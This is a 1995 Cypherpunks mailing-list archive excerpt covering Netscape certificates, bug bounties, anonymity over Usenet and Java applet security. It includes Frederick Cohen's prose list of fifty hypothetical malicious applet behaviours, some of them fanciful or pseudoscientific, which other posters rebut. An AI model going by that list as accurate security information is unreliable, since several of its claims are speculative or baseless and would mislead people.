remailer, I can't otherwise killfile you. 

   Alternatively, there seems to be growing support for the "[NOISE]"
standard, you could at least do us all the service of including that. 

   Many thanks.

--
Dan Marner                             dmarner@mis.nu.edu
Network Weasel                         http://mis.nu.edu/~dmarner
National University                    "Not on MY network!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Tue, 17 Oct 95 22:49:36 PDT
To: cypherpunks@toad.com
Subject: A comment about Netscape 2 and certifictes
In-Reply-To: <199510180307.XAA23559@book.hks.net>
Message-ID: <Pine.SOL.3.91.951018141041.27804D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Just some more noise about netscape 2,

I have been playing around with netscape 2b1 and have extracted the 
certificates it trusts from the cert.db file.  (The file is a Berkeley DB 
file and the certificates have a 7 byte prefix and a trailing printable 
string).  They are as follows

/C=US/O=AT&T/OU=Certification Authority
/C=US/O=AT&T Bell Laboratories/OU=Prototype Research CA
/C=US/SP=California/O=CommerceNet/OU=Server Certification Authority
/C=US/O=MCI/OU=internetMCI/OU=MALL
/C=US/OU=Test CA/O=Netscape Communications Corp.
/C=US/O=RSA Data Security, Inc./OU=Commercial Certification Authority
/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority

The one unusual thing is that the CA for /OU=internetMCI/OU=MALL is missing
	subject=/C=US/O=MCI/OU=internetMCI/OU=MALL
	issuer= /C=US/O=MCI/OU=internetMCI/OU=PCA  <<<<<<<
(the ComerceNet is signed by one of the RSA certificates)

The CommerceNet certificate is only using a 678 bit RSA modulus, the other 
certificates are either 1000 or 1024 bits long.

If anyone wants the certificates I can send them.

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 18 Oct 95 12:31:22 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Brief Rant (Re: Oh to be a mouse in the corner...)
In-Reply-To: <Pine.SOL.3.91.951018142342.20665B-100000@use.usit.net>
Message-ID: <199510181931.PAA05857@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan forwards:
> PR   10/17 1720  ABA: TERRORISM EXPERTS TO SPEAK
> 
>     Why is domestic terrorism on the increase?  How serious a problem is it? 

Not to worry, we'll just outlaw all unlicensed cryptography. After all, it
works in France. You don't see weekly terrorist attacks over there any more,
now do you ?

This Horseman has no horse.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 18 Oct 95 12:36:37 PDT
To: cypherpunks@toad.com
Subject: (buyinfo Req:) Stored value card alliances?
Message-ID: <v02120d00acab05139451@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Wed, 18 Oct 95 09:03:00 -0400
From: Mark <mark@bmainc.com>
Sender: Mark <mark@bmainc.com>
Organization: Bruce Morgan Associates, Inc.
To: www-buyinfo@allegra.att.com
Subject: <None>

Would someone be able recommend a table listing all the various store-value
card and digital cash strategic alliances?

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 18 Oct 95 13:16:37 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Brief Rant (Re: Oh to be a mouse in the corner...)
In-Reply-To: <199510181931.PAA05857@opine.cs.umass.edu>
Message-ID: <199510181958.PAA06747@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Futplex writes:
> Not to worry, we'll just outlaw all unlicensed cryptography. After all, it
> works in France. You don't see weekly terrorist attacks over there any more,
> now do you ?

This is a critical point to make with the press.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 13:01:41 PDT
To: Doug Cutrell <doug@cdsnet.net>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <v02120d24acaaefb40aa5@[204.118.244.112]>
Message-ID: <Pine.3.89.9510181510.B98930-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, Doug Cutrell wrote:

> It seems that there could at least be a hierarchy of shadowed newsgroups,
> e.g. alt.freespeech.*,  requiring the enduser to use special software to
> reassemble actual postings.  This could even be integrated into the
> newsreaders, or even at a local newserver level.

There already is. I think the *.test (or at least alt.test) groups have 
good propagation. Nobody "reads" anything but their own posts anyway, so 
the natives wouldn't be bothered. 

There are some "real" (as opposed to usenet posting tests) *.test 
newsgroups, so you'd have to be careful about which ones you post to.

ire hierarchy for this sort of thing widely
propagated. Last year I was a prolific contributor to alt.config. At one 
point someone on c'punks mentioned problems in getting alt.anonymous and
alt.anonymous.messages. I hoped my good reputation in alt.config (at that
time, anyway ;) might help my call for a round of re-newgrouping to increase
the groups' propagation. But I found that I couldn't convincingly justify
their existence against the objections raised by news admins. 

Let me summarize the arguments I've seen against alt.anonymous.*:

1) It's a hopeless mess for readers, because messages on all imaginable 
topics will be jumbled together there. Messages there won't fit conveniently
into the flow of threads in other newsgroups. So anonymous messages intended
for general consumption will be pointless in alt.anonymous.*

2) In light of 1), people won't look there unless they expect a personal 
message from someone. So most of the traffic there will be irrelevant to 
nearly everyone on Usenet. 

3) If it has sufficiently low bandwidth for news admins to overlook 2), it 
should be a mailing list.

The fundamental conflict, as I see it, is this: 
For security reasons, we want messages to be distributed to a very wide
audience, although those messages are only of interest to a very narrow
audience. News admins understandably are generally inclined to accept
bandwidth only in proportion to readership. For practical reasons, they don't
want to carry messages to people who aren't interested in them. It's not
easy to convince the news admins to do it anyway out of altruism.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 18 Oct 95 16:06:49 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <199510182301.QAA23898@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-plonk-
> 
> 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 13:15:23 PDT
To: t byfield <tbyfield@panix.com>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <v02120d00acaabce496b3@DialupEudora>
Message-ID: <Pine.3.89.9510181641.A97019-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, t byfield wrote:

> At 9:42 AM 10/18/95, Hal wrote:
> 
>         Of course. The problem is that protocols as implemented permit
> header-forging: it's a practical fact of the net, and one that maybe
> shouldn't be overlooked on (basically vague) 'moral' grounds, any more than

The courts can't overlook it either. There goes liability. If I posted 
pirated software from this account, according to what you're saying, I could 
claim a forgery and show reasonable doubt.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Wed, 18 Oct 95 16:28:58 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <199510182319.QAA02924@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or
> other) browser:
>
> Concept 1 - Hot Java code that, once started, takes and retains
> control of the viewer.  It includes hot buttons, etc.  that let you
> use common resources on the net, store favorite places, etc.  When
> you push any button in this window, it simulates Hot Java within its
> own code, but all reads and writes contain code to restart the
> program (such as the "remember favorite places" button, etc.).

You are obviously disillusioned/ignorant about how the java runtime
enviroment works, and what is possable with with its base class
libraries. I'll bet that you have never ever read the programming
guide or the virtual machine specs, and I encourage you to do so
before you embarass yourself even more.

Christopher

P.S. Coming Soon! 50 things that could happen to flying pigs!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 18 Oct 95 13:28:47 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [NOISE] Re: Netscape rewards are an insult
In-Reply-To: <199510181839.LAA07648@jobe.shell.portal.com>
Message-ID: <199510182028.QAA06098@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


someone claiming to be Alice de `nonymous writes:
> Is your comment about the "Bugs Bounty" program an official comment, that
> you have "no idea how valuable" it will be??  Shall I give you a clue,
> as to how valuable the discovery of a flawed algorithm might be??

Whoa there !  You've just made a huge conceptual leap, from "value of the
Bugs Bounty program" to "value of the discovery of a security flaw". I think
nearly everyone agrees that the latter is significant. There appears to be
great disagreement about the former, as Alice de `nonymous has demonstrated.

[...]
> after
> posting the exploitation algorithm last week -- on Friday the Thirteenth --
> there has been nothing but public relations huff-and-puff.

There's been a specific response to your claim, which so far you have ignored.
It would seem that you are far more interested in impugning Netscape's motives
than discussing the security issue you raised.

[...]
> I wonder ... are you paying them in shirts or migs, for their white-wash
> review??  

Ooh, I like this idea. Find a flaw, get a MiG-29 ! Of course, we knew that
Netscape Communications Corp. must be a KGB front. The Commies are still 
hoping to undermine U.S. national security. Did you notice that we heard
about the White House browsing Web pages right about the same time that
KKlinton relaxed the supercomputer export controls ?  Adding insult to
injury, they want to foist surplus Soviet goods off on us....

<chortle>

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard Martin" <rmartin@aw.sgi.com>
Date: Wed, 18 Oct 95 13:40:28 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510181641.A97019-0100000@aix2.uottawa.ca>
Message-ID: <9510181639.ZM2489@glacius.alias.com>
MIME-Version: 1.0
Content-Type: text/plain


On Oct 18,  4:15pm, s1018954@aix2.uottawa.ca wrote:
> If I posted
> pirated software from this account, according to what you're saying, I could
> claim a forgery and show reasonable doubt.

Without an author-certification mechanism in place, you can always
claim forgery. In this case, to show reasonable doubt you would probably
have to prove that some one else would have a motive for forging it in
the first place.

This is one place where importance of digital signatures can be very
strong. *If* we were all wonderful little cypher-junkies and signed
everything, then we might plausibly be able to deny forged mail: "I
sign everything I ever send, it's hardcoded into my mailer, that
didn't come from me..."

As it is, in most cases we run on trust, except where we're deliberately
trying to make certain that matters are not modified or we're trying to
make things a matter of record. [Checksums of binaries, for example,
or press releases on controversial topics.]

I'm looking forward to the point where my mail reader will sort things
according to reputations I give correspondents, and perhaps flag mail
which deviates from the norm for each correspondent. [e.g., if Tim May
signs something, it's probably pretty severe. If a pgp-fanatic doesn't,
something might be up...]

I'm also looking forward to the point where I can be on a mailing list
where folks look at the first line of my .sig and say, "this is being
written by an individual" and I don't have to worry about them thinking
I speak for organisations. [Which one would I be speaking for? Shad
Valley 1992?]

richard

--
Richard Martin
Alias|Wavefront - Toronto Office [Co-op Software Developer, Games Team]
rmartin@aw.sgi.com/g4frodo@cdf.toronto.edu      http://www.io.org/~samwise
Trinity College UofT ChemPhysCompSci 9T7+PEY=9T8 Shad Valley Waterloo 1992




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 18 Oct 95 14:06:46 PDT
To: s1018954@aix2.uottawa.ca
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510181440.A93842-0100000@aix2.uottawa.ca>
Message-ID: <Pine.SUN.3.91.951018170545.15154A-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995 s1018954@aix2.uottawa.ca wrote:

> Nah. I'll take it back. Send encrypted through usenet, receive 
> encrypted through usenet. Best of both, but very slow and only good for 
> voluntary mail reception. 

Not to mention a tremendous waste of bandwidth if people do it on a 
regular basis.

Philosophical question:  Is Usenet a "mix"?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 18 Oct 95 14:09:07 PDT
To: Marianne Mueller <mrm@netcom.com>
Subject: Re: the beverage you are about to drink
In-Reply-To: <199510181814.LAA28754@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.91.951018170831.15154B-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Marianne Mueller wrote:

> Doesn't anyone think it's sad-funny now that every styrofoam coffee cup has
> to be labeled "Warning The Beverage You Are About To Consume Is Hot!!" 

The HotJava comparisons are mind-boggling ;)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Wed, 18 Oct 95 14:21:10 PDT
To: cypherpunks@toad.com
Subject: Motherload of Crypto Site...
Message-ID: <m0t5ftL-000xhiC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

I hope that I'm providing some useful info here.
I came accross this site in DDJ (Oct 95).
A comprehensive amount of crypto stuff available. 

Crypto Stuff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Admiration, n.:
	Our polite recognition of another's resemblance to ourselves.
		-- Ambrose Bierce,

iQCVAgUBMIVvH7bmxeO+s+1xAQHS+AP+ImrrqcHfBi6OGOyu5tSAhNHrpkvPE9E5
qh3e8TsFfbyxq1UXgz73FEFfalhs3GeZOgye5DKp0/vsTQ+ZwQyizKX0XhM/MsNT
zFnv7B2uOACljwqjiMCc6ZiNA25nXveA+TMIa1sZkhTMtwHzVFogE7X4S91F2gBg
Til3urgFAWU=
=C/CT
-----END PGP SIGNATURE-----
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 17:48:54 PDT
To: cypherpunks@toad.com
Subject: Re: Media Accuracy
In-Reply-To: <9509188140.AA814053942@cc1.dttus.com>
Message-ID: <30859F7A.71B6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Martin Diehl wrote:
> 
>      In the October 16, 1995 issue of PC Week, Spencer F. Katt writes:
> 
>      >Isn't it ironic?  Andreessen creates the WEB while in college; now
>      >college students are finding all the holes in it.  Two students have
>      >uncovered a serious bug in Netscape Navigator, one Katt source
>      >contends.  The browser has a 2K-byte buffer for reading HTML
>      >documents.  Well, these tipsters found that once the page has sent
>      >more than 2K, any assembly code in the HTML document will be
>      >executed.  As an experiment, these kids set up a simple Web server
>      >with some assembly code embedded in the HTML page to overwrite the
>      >client computer's FAT table [sic].  Sure enough, it worked.
> 
>      >spencer@pcweek.ziff.com
> 
>      He might be talking about the (already fixed) bug that allowed an HREF
>      that is longer than 356 bytes to overwrite the stack.  Hadn't heard
>      here that anything would happen other than getting Netscape to crash.
>      No names or URL's were given in the story.  Maybe he needs an update.
>      Maybe we need an update.

  As far as I can tell, this is just an inaccurate re-reporting of
Ray's buffer overflow hack, which we fixed in our security patch.
 
	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 18 Oct 95 15:46:57 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <9510182246.AA02614@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Frederick B. Cohen writes:
 > 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:

Terminology:  "Java" is a programming language, "Hot Java" is the name
of a web browser that supports running Java applets, "Netscape" is the
name of another browser (and the company that makes it) that also in
some versions supports Java applets.

 > Concept 1 - Hot Java code that, once started, takes and retains control
 > of the viewer. ...

How exactly is an applet going to "take control" if the local class
libraries don't allow (for example) the browser's "native" menus to be
overridden?

Isn't it somewhat important to distinguish between attacks along the
lines of what Perry Metzger has suggested (exploiting interpreter bugs
or devious paths through "safe" features) and attacks based on
relatively wild hypothetical speculation?  I mean, just about all of
the "attacks" in this note could just as well be applied to any
software at all that you might choose to run on your machine.  Indeed,
I'd say that Java applets are probably a lot *safer* than an arbitrary
application in a lot of these cases, because they've got less to work
with (the AWT or whatever class libraries the browser makes available,
which could be quite limited).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chip@communities.com (Chip Morningstar)
Date: Wed, 18 Oct 95 17:42:29 PDT
To: cypherpunks@toad.com
Subject: Re:  50 attacks on Netscape - please send the check
Message-ID: <9510190047.AA14597@ communities.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) writes:
>50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> ... (drivel elided)

This fellow seems to be systematically (if not deliberately) ignorant
about these things.

One of my co-workers reviewed his book on computer viruses in IEEE
Multimedia and noted that it manifests many of the same fallacies. You
can read it (the review, not the book) at

http://www.communities.com/paper/itsalive.html

--
-------------------------------------------------------------------------------
| Chip Morningstar                     |                                      |
| Electric Communities                 | "I'm old enough to be living in      |
| 280 2nd Street, Los Altos, CA 94022  |  the future I was warned about."     |
| 415-917-5640                         |         -- Myron Krueger             |
| chip@communities.com                 |                                      |
-------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Wed, 18 Oct 95 18:41:32 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <9510190043.AA11578@all.net>
Message-ID: <199510190110.SAA02346@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Boy, you people just don't appreciate anything that has a little bit of
> humor mixed with a little bit of reality. 

A little reality?? I've seen episodes of Star Trek with more reality.

Get real,
Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 15:16:28 PDT
To: cypherpunks@toad.com
Subject: 50 attacks on Netscape - please send the check
Message-ID: <9510182213.AA05709@all.net>
MIME-Version: 1.0
Content-Type: text


50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:

Concept 1 - Hot Java code that, once started, takes and retains control
of the viewer.  It includes hot buttons, etc.  that let you use common
resources on the net, store favorite places, etc.  When you push any
button in this window, it simulates Hot Java within its own code, but
all reads and writes contain code to restart the program (such as the
"remember favorite places" button, etc.).

	Attack 1 - It records all entries and sends them to an unfriendly.
	This includes credit card numbers, etc.

	Attack 2 - It reroutes all traffic through a known site to record
	information about all of your accesses.

	Attack 3 - It selectively multiplies dollar values on purchases up
	by a factor of 10 when you authorize purchases through their store.

	Attack 4 - It reroutes all purchases through their intermediary and
	adds 20% for the service, thus becoming the middle person in all
	your transactions.

	Attack 5 - It replaces select information from select sites with
	false or misleading information - particularly about the competition.

	Attack 6 - It reports certain sites as down, thus damaging the reputation
	of those sites.

	Attack 7 - It sends requests to sites and ignores their answers to increase
	hit rates on key vendors that pay for their W3 sites based on usage.

	Attack 8 - It gets dirty pictures using your credit card information
	and sends it to another recipient.

	Attack 9 - It implements an anonymous remailer for smut, thus making
	you the smut capital of the network.

	Attack 10 - It waits till you save another Java code from the
	net and replaces the code with its own code and a pointer to the
	code you thought you got.

	Attack 11 - It waits till you save a file and overflows your disk with
	garbage.

	Attack 12 - It sends displays that flash on the screen at a rate that
	causes epilectic seizures.

	Attack 13 - It puts up subliminal messages to cause you to
	accept its subsequent request to overwrite a .com file onto your
	disk.

	Attack 14 - It analyzes your typing style to determine psychological
	factors and stores that information in a database.

	Attack 15 - It analyzes your typing style to determine psychological
	factors and, if you are a child, connects you to child pornography
	rings.

	Attack 16 - It sends requests for URLs to numerous addresses on
	your network, records results, and returns a network map to the
	attacker.

	Attack 17 - It uses spare time when you are not computing to participate
	in codebreaking activities, including the breaking of netscape codes.

	Attack 18 - It sends massive quantities of email to mailing lists
	creating the impression that you are not a nice person (a spammer)

	Attack 19 - When it recieves incoming email, it sends copies to
	newsgroups who now have access to all your personal incoming mail.

	Attack 20 - When you send outgoing email, it sends copies to
	newsgroups who now have access to all your personal outgoing mail.

	Attack 21 - When you send outbound email, it adds insulting or
	abusive humor to the end of your signature line.

	Attack 22 - It is used to send and receive email as part of a
	right wing group's coordination activities aimed at overthrowing the
	government.

	Attack 23 - It slowly fades your screen till you think the
	display is going bad, forcing you to buy a new display.

	Attack 24 - It slowly degrades performance causing you to think you need
	a faster computer.

	Attack 25 - It sends threatenning email to the President under
	your name, getting you arrested.

	Attack 26 - It sends embarassing email to the New York Times getting
	you fired.

Concept 2 - Hot Java code that sends all of your messages through my computer
and gets the results back from my computer by rewriting URLs on-the-fly.

	Attack 27 - Attack 3 from above, but with more intelligence so that
	amounts are changes less obviously.

	Attack 28 - Attack 4 from above, but it also changes the costs on incoming
	information so that you can't detect the price change in the process.

	Attack 29 - Attack 5 from above, except that it is more sophistocated -
	like creating misspellings or poor formatting or moving the locations
	in maps so that when you push on one part of a map, it sends a different
	part to ther server.

	Attack 30 - Attack 6 from above, except that instead of reporting servers
	down, it makes them seem very slow, or misses lines of pictures, etc. to
	make them look bad but without causing trouble reports.

	Attack 31 - Records all credit card transactions and forward information
	to services that pay to know what you buy.

	Attack 32 - Determines whether you look at dirty pictures and, if so,
	sends the information to criminals to use against you in shakedowns.

	Attack 33 - Replaces legitimate calls to children's pages with child
	pornography - including solicitations for where you can become a star.

	Attack 34 - Adds subliminal messages to sound files that cause you to
	enter a murderous rage (as in the claims about acid rock a few years
	back).

	Attack 35 - Adds dirty pictures to video files causing you to become
	sex-crazed and commit sex crimes and have bad dreams.

	Attack 36 - Causes simulated waviness on the screen, resulting in
	dizziness and increased sick time at work.

	Attack 37 - Introduces high frequency buzzing that irritates people
	and causes them to become more violent and less cooperative.

	Attack 38 - Introduces low frequency beating (similar to the tactics used
	against the Branch Dividians and in Viet Nam) to weaken your resolve and
	then asks you to confirm the upload of a program.

	Attack 39 - Creates subliminal feedback to your use of the Web to get
	you to tend toward particular services and away from others.

	Attack 40 - Adds background advertising to all your pictures.

	Attack 41 - Replaces the background information provided by Web sites
	with the attackers background advertising.

	Attack 42 - Shifts frequencies of sound files from select other sites
	so they seem off-pitch and don't reflect well on those companies.

	Attack 43 - Reroutes all of your Web requests through the NSA and CIA
	so they can do better intelligence.

	Attack 44 - Causes select Web sites to require User ID and Password
	information before use (particularly company Web sites) so as to get
	you to reveal your UIDs and passwords.

	Attack 45 - Renames Web sites so that your remembered sites only
	work for a few days and then the pointers appear to go away.

	Attack 46 - Puts a lot of really interesting things on your screen, thus
	making you believe that the Web is really great, and then removes them
	from accessibility when you try to get them again.

	Attack 47 - Universally replaces the work AND with OR in all Web information.

	Attack 48 - Randomizes all 5-digit numbers sent via the Web, thus confusing all
	zip codes contained in address fields.

	Attack 49 - Sends a series of high frequency sounds combined with screen
	flashes designed to cause permanent brain damage.


Concept 3 - There is a chosen plaintext attack against the RSA (published in the
1980s in a Crypto conference (IACR?).

	Attack 50 - Use your Hot Java capability to sign selected
	message after message till the attacker derives your private key.
	I think this takes one or two messages per bit of private key.

	Bonus Attack (no extra charge) - If they use your PGP random
	number information, they get your PGP key too!


Netscape: Please send your check for US$50,000 to the address below.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Neal" <dneal@electrotex.com>
Date: Wed, 18 Oct 95 16:49:46 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510182357.SAA05686@etex.electrotex.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Wed, 18 Oct 1995 16:01:00 -0400 (EDT)
> From:          s1018954@aix2.uottawa.ca
> Reply-to:      s1018954@aix2.uottawa.ca
> Subject:       Re: Anonymity: A Modest Proposal
> To:            Doug Cutrell <doug@cdsnet.net>
> Cc:            cypherpunks@toad.com

> 
> 
> On Wed, 18 Oct 1995, Doug Cutrell wrote:
> 
> > It seems that there could at least be a hierarchy of shadowed newsgroups,
> > e.g. alt.freespeech.*,  requiring the enduser to use special software to
> > reassemble actual postings.  This could even be integrated into the
> > newsreaders, or even at a local newserver level.
> 
> There already is. I think the *.test (or at least alt.test) groups have 
> good propagation. Nobody "reads" anything but their own posts anyway, so the
> natives wouldn't be bothered. 
>

YIKES!   Think again.  Many of the *.test newsgroups have auto-responders
that remail the poster assuring them their post was received.  This feature
is used to make sure your newsfeed is working.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julius Cisek <jules@netscape.com>
Date: Wed, 18 Oct 95 18:49:59 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <3084DD5B.4AD1@netscape.com>
Message-ID: <3085AE63.BB6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:
> 
>         "Netscape can be used securely by sufficiently knowledgeable
>         users who have emasculated their postscript interpreters before
>         using them to view files of unknown origin, and who have removed
>         all other known, unknown, and/or undisclosed security holes from
>         their systems.  Otherwise, Netscape is insecure and should not be
>         trusted."

Err...  If software companies were to follow your line of logic, software
boxes (all sorts of software) would become covered with fine print.  As
would ads for the software.  Although I'm sure industry lawyers would
welcome that, personally I think it would be quite sad.

A stupid example:
I can replace copy on your machine so that it does a delete instead.
Does that mean that the OS manufacturer has to warn a user about this?

There's a point at which one has to hand off the assessment to the buyer.

This is my own opinion and also that of anyone who agrees with me.
I'm reading this group because it's very interesting for me personally.
There.

-- 

~Jules (Julius Cisek)   /- __  -   mailto:jules@netscape.com
Server Eng, NETSCAPE  /\ >\=/\ --- http://home.netscape.com/people/jules
MtnView-CA-USA-Earth  \/   -\/ --  p:415.528.2968 f:415.528.4122
          ---===> COGITO ERGO VROOM <===---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dawg@frontier.wilpaterson.edu
Date: Wed, 18 Oct 95 16:46:03 PDT
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <9510182347.AA05742@frontier.wilpaterson.edu>
MIME-Version: 1.0
Content-Type: text/plain


hi.
 i'd like some info.
thanks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 18 Oct 95 19:05:17 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <DGnrDy.H3G@sgi.sgi.com>
Message-ID: <199510190205.TAA12988@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGnrDy.H3G@sgi.sgi.com>, anonymous-remailer@shell.portal.com writes:

> Is your comment about the "Bugs Bounty" program an official comment, that
> you have "no idea how valuable" it will be??  Shall I give you a clue,
> as to how valuable the discovery of a flawed algorithm might be??

[ ... ]

> Alice de 'nonymous ...

I've deleted the rest of your content-free rant.  Instead of alluding to
some "flawed algorithm", why not tell us about the hole you say you've
found in netscape?

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 18 Oct 95 19:09:51 PDT
To: cypherpunks@toad.com
Subject: Re: java flaw
In-Reply-To: <DGMpss.5q6@sgi.sgi.com>
Message-ID: <199510190209.TAA12996@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


